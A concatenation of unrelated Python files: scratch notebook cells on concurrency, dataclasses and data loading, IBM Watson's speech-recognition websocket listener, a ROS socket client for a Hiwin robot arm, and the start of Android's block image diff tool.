print(f"Downloaded {len(sites)} in {duration} seconds")
#%%
# https://realpython.com/python-concurrency/#what-is-parallelism
import asyncio
import time
import aiohttp
async def download_site(session, url):
async with session.get(url) as response:
print("Read {0} from {1}".format(response.content_length, url))
async def download_all_sites(sites):
async with aiohttp.ClientSession() as session:
tasks = []
for url in sites:
task = asyncio.ensure_future(download_site(session, url))
tasks.append(task)
await asyncio.gather(*tasks, return_exceptions=True)
if __name__ == "__main__":
sites = [
"https://www.jython.org",
"http://olympus.realpython.org/dice",
] * 80
start_time = time.time()
asyncio.get_event_loop().run_until_complete(download_all_sites(sites))
duration = time.time() - start_time
print(f"Downloaded {len(sites)} sites in {duration} seconds")
#%%
# https://realpython.com/python-data-classes/
from dataclasses import dataclass
@dataclass
class DataClassCard:
rank: str
suit: str
default_test: str = 'default'
card = DataClassCard('Q', 'Hearts')
print(card)
print(card == DataClassCard('Q', 'Hearts'))
#%%
from dataclasses import dataclass, field
def get_str():
return 'default'
def get_lst():
return [1, 2]
@dataclass
class DataClassCard:
rank: str
suit: str
# default_test: str = field(default_factory=get_str)
# default_test: str = [1, 2]
default_test: str = field(default_factory=get_lst)
card = DataClassCard('Q', 'Hearts')
print(card)
print(card.default_test)
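# related sketch (my addition): asdict/astuple turn a dataclass instance into plain containers
from dataclasses import asdict, astuple
print(asdict(card))
print(astuple(card))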
#%%
import subprocess
def get_git_revision_hash():
return subprocess.check_output(['git', 'rev-parse', 'HEAD']).decode('ascii').strip()
def get_git_revision_short_hash():
return subprocess.check_output(['git', 'rev-parse', '--short', 'HEAD']).decode('ascii').strip()
print(get_git_revision_hash())
print(get_git_revision_short_hash())
# %%
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_theme(style="darkgrid")
# Load an example dataset with long-form data
fmri = sns.load_dataset("fmri")
print(fmri)
# Plot the responses for different events and regions
sns.lineplot(x="timepoint", y="signal",
hue="region", style="event",
data=fmri)
# plt.show()
# https://stackoverflow.com/questions/56203420/how-to-use-custom-error-bar-in-seaborn-lineplot
#%%
from torchmeta.datasets.helpers import omniglot
# from meta_learning.datasets.mini_imagenet import MetaImageNet, ImageNet
from torchmeta.utils.data import BatchMetaDataLoader
dataset = omniglot("data", ways=5, shots=5, test_shots=15, meta_train=True, download=True)
dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
for batch in dataloader:
train_inputs, train_targets = batch["train"]
print('Train inputs shape: {0}'.format(train_inputs.shape)) # (16, 25, 1, 28, 28)
print('Train targets shape: {0}'.format(train_targets.shape)) # (16, 25)
test_inputs, test_targets = batch["test"]
print('Test inputs shape: {0}'.format(test_inputs.shape)) # (16, 75, 1, 28, 28)
print('Test targets shape: {0}'.format(test_targets.shape)) # (16, 75)
#%%
from torchmeta.datasets.helpers import miniimagenet
from torchmeta.utils.data import BatchMetaDataLoader
dataset = miniimagenet("data", ways=5, shots=5, test_shots=15, meta_train=True, download=True)
dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
print(f'{len(dataloader)}')
for batch in dataloader:
train_inputs, train_targets = batch["train"]
print('Train inputs shape: {0}'.format(train_inputs.shape)) # (16, 25, 1, 28, 28)
print('Train targets shape: {0}'.format(train_targets.shape)) # (16, 25)
test_inputs, test_targets = batch["test"]
print('Test inputs shape: {0}'.format(test_inputs.shape)) # (16, 75, 1, 28, 28)
print('Test targets shape: {0}'.format(test_targets.shape)) # (16, 75)
break
#%%
# A Python program to demonstrate working of OrderedDict
from collections import OrderedDict
print("This is a Dict:\n")
d = {}
d['a'] = 1
d['b'] = 2
d['c'] = 3
d['d'] = 4
for key, value in d.items():
print(key, value)
print("\nThis is an Ordered Dict:\n")
od = OrderedDict()
od['a'] = 1
od['b'] = 2
od['c'] = 3
od['d'] = 4
for key, value in od.items():
print(key, value)
od[0] # error
list(od)[0] # gets first key
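# cheaper first-key access (my addition): avoids building the whole key list
print(next(iter(od)))          # first key
print(next(iter(od.items())))  # first (key, value) pair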
#%%
od = OrderedDict()
od[(0, 0)] = 0
od[(0, 1)] = 1
od[(1, 0)] = 2
od[(1, 1)] = 3
print(od)
for key, value in od.items():
print(type(key))
print(key, value)
#%%
"""
forced named arguments: https://stackoverflow.com/questions/2965271/forced-naming-of-parameters-in-python/14298976#14298976
"""
def foo(pos, *, forcenamed = None):
print(pos, forcenamed)
foo(pos=10, forcenamed=20)
foo(10, forcenamed=20)
foo(10)
foo(10, 20) # error
def foo2(pos, *, forcenamed):
print(pos, forcenamed)
foo2(pos=10, forcenamed=20)
foo2(10, forcenamed=20)
# basically you always have to give the (named) value!
foo2(10)
#%%
print('0'.isnumeric())
print('1'.isnumeric())
print('123'.isnumeric())
print('-123'.isnumeric())
print('-1.23'.isnumeric())
print('0.0'.isnumeric())
print('-1'.isnumeric())
print()
print('0'.isdigit())
print('1'.isdigit())
print('123'.isdigit())
print('-123'.isdigit())
print('-1.23'.isdigit())
print('0.0'.isdigit())
print('-1'.isdigit())
from typing import Any
def is_float(element: Any) -> bool:
    try:
        float(element)
        return True
    except ValueError:
        return False
|
recognize_listener.py
|
# coding: utf-8
# Copyright 2018 IBM All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import websocket
import json
import time
import ssl
import threading
ONE_KB = 1024
TIMEOUT_PREFIX = "No speech detected for"
TEN_MILLISECONDS = 0.01
STATE = "state"
ACTION = "action"
START = "start"
STOP = "stop"
class RecognizeListener(object):
def __init__(self,
audio_source,
options,
callback,
url,
headers,
http_proxy_host=None,
http_proxy_port=None,
verify=None):
self.audio_source = audio_source
self.options = options
self.callback = callback
self.url = url
self.headers = headers
self.http_proxy_host = http_proxy_host
self.http_proxy_port = http_proxy_port
self.isListening = False
self.verify = verify
self.dead = False
self.done = False
self.is_ws_closed = False
# websocket.enableTrace(True)
def start(self):
self.ws_client = websocket.WebSocketApp(
self.url,
header=self.headers,
on_open=self.on_open,
on_data=self.on_data,
on_error=self.on_error,
on_close=self.on_close,
)
self.ws_client.run_forever(http_proxy_host=self.http_proxy_host,
http_proxy_port=self.http_proxy_port,
sslopt={"cert_reqs": ssl.CERT_NONE} if self.verify is not None else None)
def close(self):
self.dead = True
while not self.done:
time.sleep(0.001)
if not self.is_ws_closed:
self.ws_client.close()
@classmethod
def build_start_message(cls, options):
options[ACTION] = START
return options
@classmethod
def build_closing_message(cls):
return json.dumps({ACTION: STOP}).encode('utf8')
@classmethod
def extract_transcripts(cls, alternatives):
transcripts = []
for alternative in alternatives:
transcript = {}
if 'confidence' in alternative:
transcript['confidence'] = alternative['confidence']
transcript['transcript'] = alternative['transcript']
transcripts.append(transcript)
return transcripts
def send(self, data, opcode=websocket.ABNF.OPCODE_TEXT):
"""
Send message to server.
data: message to send. If you set opcode to OPCODE_TEXT,
data must be utf-8 string or unicode.
opcode: operation code of data. default is OPCODE_TEXT.
"""
self.ws_client.send(data, opcode)
def send_audio(self, ws):
"""
Stream audio to server
:param ws: Websocket client
"""
def run(*args):
"""Background process to stream the data"""
if not self.audio_source.is_buffer:
while not self.dead:
chunk = self.audio_source.input.read(ONE_KB)
if not chunk:
break
self.ws_client.send(chunk, websocket.ABNF.OPCODE_BINARY)
time.sleep(TEN_MILLISECONDS)
self.audio_source.input.close()
else:
while not self.dead:
try:
if not self.audio_source.input.empty():
chunk = self.audio_source.input.get()
self.ws_client.send(chunk, websocket.ABNF.OPCODE_BINARY)
time.sleep(TEN_MILLISECONDS)
if self.audio_source.input.empty():
if self.audio_source.is_recording:
time.sleep(TEN_MILLISECONDS)
else:
break
except Exception:
if self.audio_source.is_recording:
time.sleep(TEN_MILLISECONDS)
else:
break
time.sleep(TEN_MILLISECONDS)
if not self.is_ws_closed:
self.ws_client.send(self.build_closing_message(), websocket.ABNF.OPCODE_TEXT)
self.done = True
run_thread = threading.Thread(target=run)
run_thread.daemon = True
run_thread.start()
def on_open(self, ws):
"""
Callback executed when a connection is opened to the server.
Handles streaming of audio to the server.
:param ws: Websocket client
"""
self.callback.on_connected()
# Send initialization message
init_data = self.build_start_message(self.options)
self.ws_client.send(json.dumps(init_data).encode('utf8'), websocket.ABNF.OPCODE_TEXT)
def on_data(self, ws, message, message_type, fin):
"""
Callback executed when message is received from the server.
:param ws: Websocket client
:param message: utf-8 string which we get from the server.
:param message_type: Message type which is either ABNF.OPCODE_TEXT or ABNF.OPCODE_BINARY
:param fin: continue flag. If 0, the data continues.
"""
        try:
            json_object = json.loads(message)
        except Exception:
            self.on_error(ws, 'Unable to parse received message.')
            return  # json_object is undefined if parsing failed
if 'error' in json_object:
# Only call on_error() if a real error occurred. The STT service sends
# {"error" : "No speech detected for 5s"} for valid timeouts, configured by
# options.inactivity_timeout
error = json_object['error']
if error.startswith(TIMEOUT_PREFIX):
self.callback.on_inactivity_timeout(error)
else:
self.on_error(ws, error)
# if uninitialized, receive the initialization response from the server
elif 'state' in json_object:
if not self.isListening:
self.isListening = True
self.callback.on_listening()
self.send_audio(ws)
else:
# close the connection
self.callback.on_close()
ws.close()
# if in streaming
elif 'results' in json_object or 'speaker_labels' in json_object:
hypothesis = ''
if 'results' in json_object:
hypothesis = json_object['results'][0]['alternatives'][0][
'transcript']
b_final = (json_object['results'][0]['final'] is True)
transcripts = self.extract_transcripts(
json_object['results'][0]['alternatives'])
if b_final:
self.callback.on_transcription(transcripts)
self.callback.on_hypothesis(hypothesis)
self.callback.on_data(json_object)
def on_error(self, ws, error):
"""
Callback executed when an error is received
:param ws: Websocket client
:param error: Exception object
"""
self.callback.on_error(error)
def on_close(self, ws):
"""
Callback executed when websocket connection is closed
:param ws: Websocket client
"""
self.is_ws_closed = True
self.callback.on_close()
|
HiwinRA605_socket_ros_test_20190625190025.py
|
#!/usr/bin/env python3
# license removed for brevity
# Receive commands from the strategy side and forward them to the control PC over a socket
import socket
## multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0'  # initial value of the data to transmit
Arm_feedback = 1  # assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0  # initial value of the response counter
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # PEP 479: raising StopIteration inside a generator is a RuntimeError on Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server side-------
def point_data(req):  ## receive pose data sent from the strategy side
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
point_data_flag = True
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req):  ## receive arm-mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ## receive speed-mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ## receive gripper action data sent from the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ## create the ROS service server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server side end-------
##----------socket packet transmission--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
while 1:
        ##---------------send arm commands over the socket-----------------
        #-------select mode--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
            #-------set arm speed--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
            #-------set arm delay time--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
            #-------set arm fast/safe speed mode--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
            socket_cmd.action= 5 ## switch back to the initial mode state
            s.send(data.encode('utf-8'))# send the command string over the socket
feedback_str = s.recv(1024)
            # the arm side reports its state
            if str(feedback_str[2]) == '70':# 'F': arm is ready to accept the next motion command
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
            if str(feedback_str[2]) == '84':# 'T': arm is busy and cannot execute the next motion command
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
            if str(feedback_str[2]) == '54':# '6': strategy finished
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
            ##---------------send arm commands over the socket end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
s.close()
def socket_command():
while(point_data_flag == True or arm_mode_flag == True or speed_mode_flag == True):
        ##---------------send arm commands over the socket-----------------
        #-------select mode--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
            #-------set arm speed--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
            #-------set arm delay time--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
            #-------set arm fast/safe speed mode--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
return(data)
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5 ## set the initial mode state
t = threading.Thread(target=thread_test)
    t.start() # start the socket client worker thread
socket_server()
t.join()
|
blockimgdiff.py
|
# Copyright (C) 2014 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from collections import deque, OrderedDict
from hashlib import sha1
import array
import common
import functools
import heapq
import itertools
import multiprocessing
import os
import re
import subprocess
import threading
import time
import tempfile
from rangelib import RangeSet
__all__ = ["EmptyImage", "DataImage", "BlockImageDiff"]
def compute_patch(src, tgt, imgdiff=False):
srcfd, srcfile = tempfile.mkstemp(prefix="src-")
tgtfd, tgtfile = tempfile.mkstemp(prefix="tgt-")
patchfd, patchfile = tempfile.mkstemp(prefix="patch-")
os.close(patchfd)
try:
with os.fdopen(srcfd, "wb") as f_src:
for p in src:
f_src.write(p)
with os.fdopen(tgtfd, "wb") as f_tgt:
for p in tgt:
f_tgt.write(p)
try:
os.unlink(patchfile)
except OSError:
pass
if imgdiff:
p = subprocess.call(["imgdiff", "-z", srcfile, tgtfile, patchfile],
stdout=open("/dev/null", "a"),
stderr=subprocess.STDOUT)
else:
p = subprocess.call(["bsdiff", srcfile, tgtfile, patchfile])
if p:
raise ValueError("diff failed: " + str(p))
with open(patchfile, "rb") as f:
return f.read()
finally:
try:
os.unlink(srcfile)
os.unlink(tgtfile)
os.unlink(patchfile)
except OSError:
pass
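# Illustrative usage sketch (not part of the original module): compute_patch()
# takes iterables of byte strings and shells out to the external `bsdiff` (or
# `imgdiff -z`) binary, which must be on PATH. `_compute_patch_example` is a
# hypothetical helper added for demonstration only.
def _compute_patch_example():
  src_chunks = ["hello world\n" * 64]   # old contents, as a list of strings
  tgt_chunks = ["hello there\n" * 64]   # new contents
  patch = compute_patch(src_chunks, tgt_chunks, imgdiff=False)
  return len(patch)                     # size of the generated bsdiff patch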
class Image(object):
def ReadRangeSet(self, ranges):
raise NotImplementedError
def TotalSha1(self, include_clobbered_blocks=False):
raise NotImplementedError
class EmptyImage(Image):
"""A zero-length image."""
blocksize = 4096
care_map = RangeSet()
clobbered_blocks = RangeSet()
extended = RangeSet()
total_blocks = 0
file_map = {}
def ReadRangeSet(self, ranges):
return ()
def TotalSha1(self, include_clobbered_blocks=False):
# EmptyImage always carries empty clobbered_blocks, so
# include_clobbered_blocks can be ignored.
assert self.clobbered_blocks.size() == 0
return sha1().hexdigest()
class DataImage(Image):
"""An image wrapped around a single string of data."""
def __init__(self, data, trim=False, pad=False):
self.data = data
self.blocksize = 4096
assert not (trim and pad)
partial = len(self.data) % self.blocksize
padded = False
if partial > 0:
if trim:
self.data = self.data[:-partial]
elif pad:
self.data += '\0' * (self.blocksize - partial)
padded = True
else:
raise ValueError(("data for DataImage must be multiple of %d bytes "
"unless trim or pad is specified") %
(self.blocksize,))
assert len(self.data) % self.blocksize == 0
self.total_blocks = len(self.data) / self.blocksize
self.care_map = RangeSet(data=(0, self.total_blocks))
# When the last block is padded, we always write the whole block even for
# incremental OTAs. Because otherwise the last block may get skipped if
# unchanged for an incremental, but would fail the post-install
# verification if it has non-zero contents in the padding bytes.
# Bug: 23828506
if padded:
clobbered_blocks = [self.total_blocks-1, self.total_blocks]
else:
clobbered_blocks = []
self.clobbered_blocks = clobbered_blocks
self.extended = RangeSet()
zero_blocks = []
nonzero_blocks = []
reference = '\0' * self.blocksize
for i in range(self.total_blocks-1 if padded else self.total_blocks):
d = self.data[i*self.blocksize : (i+1)*self.blocksize]
if d == reference:
zero_blocks.append(i)
zero_blocks.append(i+1)
else:
nonzero_blocks.append(i)
nonzero_blocks.append(i+1)
assert zero_blocks or nonzero_blocks or clobbered_blocks
self.file_map = dict()
if zero_blocks:
self.file_map["__ZERO"] = RangeSet(data=zero_blocks)
if nonzero_blocks:
self.file_map["__NONZERO"] = RangeSet(data=nonzero_blocks)
if clobbered_blocks:
self.file_map["__COPY"] = RangeSet(data=clobbered_blocks)
def ReadRangeSet(self, ranges):
return [self.data[s*self.blocksize:e*self.blocksize] for (s, e) in ranges]
def TotalSha1(self, include_clobbered_blocks=False):
if not include_clobbered_blocks:
ranges = self.care_map.subtract(self.clobbered_blocks)
return sha1(self.ReadRangeSet(ranges)).hexdigest()
else:
return sha1(self.data).hexdigest()
class Transfer(object):
def __init__(self, tgt_name, src_name, tgt_ranges, src_ranges, style, by_id):
self.tgt_name = tgt_name
self.src_name = src_name
self.tgt_ranges = tgt_ranges
self.src_ranges = src_ranges
self.style = style
self.intact = (getattr(tgt_ranges, "monotonic", False) and
getattr(src_ranges, "monotonic", False))
# We use OrderedDict rather than dict so that the output is repeatable;
# otherwise it would depend on the hash values of the Transfer objects.
self.goes_before = OrderedDict()
self.goes_after = OrderedDict()
self.stash_before = []
self.use_stash = []
self.id = len(by_id)
by_id.append(self)
def NetStashChange(self):
return (sum(sr.size() for (_, sr) in self.stash_before) -
sum(sr.size() for (_, sr) in self.use_stash))
def ConvertToNew(self):
assert self.style != "new"
self.use_stash = []
self.style = "new"
self.src_ranges = RangeSet()
def __str__(self):
return (str(self.id) + ": <" + str(self.src_ranges) + " " + self.style +
" to " + str(self.tgt_ranges) + ">")
@functools.total_ordering
class HeapItem(object):
def __init__(self, item):
self.item = item
# Negate the score since python's heap is a min-heap and we want
# the maximum score.
self.score = -item.score
def clear(self):
self.item = None
  def __bool__(self):
    return self.item is not None
  # Python 2 uses __nonzero__, while Python 3 uses __bool__.
  __nonzero__ = __bool__
def __eq__(self, other):
return self.score == other.score
def __le__(self, other):
return self.score <= other.score
# BlockImageDiff works on two image objects. An image object is
# anything that provides the following attributes:
#
# blocksize: the size in bytes of a block, currently must be 4096.
#
# total_blocks: the total size of the partition/image, in blocks.
#
# care_map: a RangeSet containing which blocks (in the range [0,
# total_blocks) we actually care about; i.e. which blocks contain
# data.
#
# file_map: a dict that partitions the blocks contained in care_map
# into smaller domains that are useful for doing diffs on.
# (Typically a domain is a file, and the key in file_map is the
# pathname.)
#
# clobbered_blocks: a RangeSet containing which blocks contain data
# but may be altered by the FS. They need to be excluded when
# verifying the partition integrity.
#
# ReadRangeSet(): a function that takes a RangeSet and returns the
# data contained in the image blocks of that RangeSet. The data
# is returned as a list or tuple of strings; concatenating the
# elements together should produce the requested data.
# Implementations are free to break up the data into list/tuple
# elements in any way that is convenient.
#
# TotalSha1(): a function that returns (as a hex string) the SHA-1
# hash of all the data in the image (ie, all the blocks in the
# care_map minus clobbered_blocks, or including the clobbered
# blocks if include_clobbered_blocks is True).
#
# When creating a BlockImageDiff, the src image may be None, in which
# case the list of transfers produced will never read from the
# original image.
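# Hypothetical sketch (not in the original file) of a minimal object that
# satisfies the interface described above; DataImage and EmptyImage are the
# real implementations used in practice.
class _SketchImage(Image):
  blocksize = 4096
  total_blocks = 1
  care_map = RangeSet(data=(0, 1))
  clobbered_blocks = RangeSet()
  extended = RangeSet()
  file_map = {"__ZERO": RangeSet(data=(0, 1))}   # a single all-zero block
  def ReadRangeSet(self, ranges):
    return ["\0" * ((e - s) * self.blocksize) for (s, e) in ranges]
  def TotalSha1(self, include_clobbered_blocks=False):
    return sha1("".join(self.ReadRangeSet(self.care_map))).hexdigest()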
class BlockImageDiff(object):
def __init__(self, tgt, src=None, threads=None, version=4,
disable_imgdiff=False):
if threads is None:
threads = multiprocessing.cpu_count() // 2
if threads == 0:
threads = 1
self.threads = threads
self.version = version
self.transfers = []
self.src_basenames = {}
self.src_numpatterns = {}
self._max_stashed_size = 0
self.touched_src_ranges = RangeSet()
self.touched_src_sha1 = None
self.disable_imgdiff = disable_imgdiff
assert version in (1, 2, 3, 4)
self.tgt = tgt
if src is None:
src = EmptyImage()
self.src = src
# The updater code that installs the patch always uses 4k blocks.
assert tgt.blocksize == 4096
assert src.blocksize == 4096
# The range sets in each filemap should comprise a partition of
# the care map.
self.AssertPartition(src.care_map, src.file_map.values())
self.AssertPartition(tgt.care_map, tgt.file_map.values())
@property
def max_stashed_size(self):
return self._max_stashed_size
def Compute(self, prefix):
# When looking for a source file to use as the diff input for a
# target file, we try:
# 1) an exact path match if available, otherwise
# 2) a exact basename match if available, otherwise
# 3) a basename match after all runs of digits are replaced by
# "#" if available, otherwise
# 4) we have no source for this target.
self.AbbreviateSourceNames()
self.FindTransfers()
# Find the ordering dependencies among transfers (this is O(n^2)
# in the number of transfers).
self.GenerateDigraph()
# Find a sequence of transfers that satisfies as many ordering
# dependencies as possible (heuristically).
self.FindVertexSequence()
# Fix up the ordering dependencies that the sequence didn't
# satisfy.
if self.version == 1:
self.RemoveBackwardEdges()
else:
self.ReverseBackwardEdges()
self.ImproveVertexSequence()
# Ensure the runtime stash size is under the limit.
if self.version >= 2 and common.OPTIONS.cache_size is not None:
self.ReviseStashSize()
# Double-check our work.
self.AssertSequenceGood()
self.ComputePatches(prefix)
self.WriteTransfers(prefix)
def HashBlocks(self, source, ranges): # pylint: disable=no-self-use
data = source.ReadRangeSet(ranges)
ctx = sha1()
for p in data:
ctx.update(p)
return ctx.hexdigest()
def WriteTransfers(self, prefix):
def WriteSplitTransfers(out, style, target_blocks):
"""Limit the size of operand in command 'new' and 'zero' to 1024 blocks.
This prevents the target size of one command from being too large; and
might help to avoid fsync errors on some devices."""
assert (style == "new" or style == "zero")
blocks_limit = 1024
total = 0
while target_blocks:
blocks_to_write = target_blocks.first(blocks_limit)
out.append("%s %s\n" % (style, blocks_to_write.to_string_raw()))
total += blocks_to_write.size()
target_blocks = target_blocks.subtract(blocks_to_write)
return total
out = []
total = 0
stashes = {}
stashed_blocks = 0
max_stashed_blocks = 0
free_stash_ids = []
next_stash_id = 0
for xf in self.transfers:
if self.version < 2:
assert not xf.stash_before
assert not xf.use_stash
for s, sr in xf.stash_before:
assert s not in stashes
if free_stash_ids:
sid = heapq.heappop(free_stash_ids)
else:
sid = next_stash_id
next_stash_id += 1
stashes[s] = sid
if self.version == 2:
stashed_blocks += sr.size()
out.append("stash %d %s\n" % (sid, sr.to_string_raw()))
else:
sh = self.HashBlocks(self.src, sr)
if sh in stashes:
stashes[sh] += 1
else:
stashes[sh] = 1
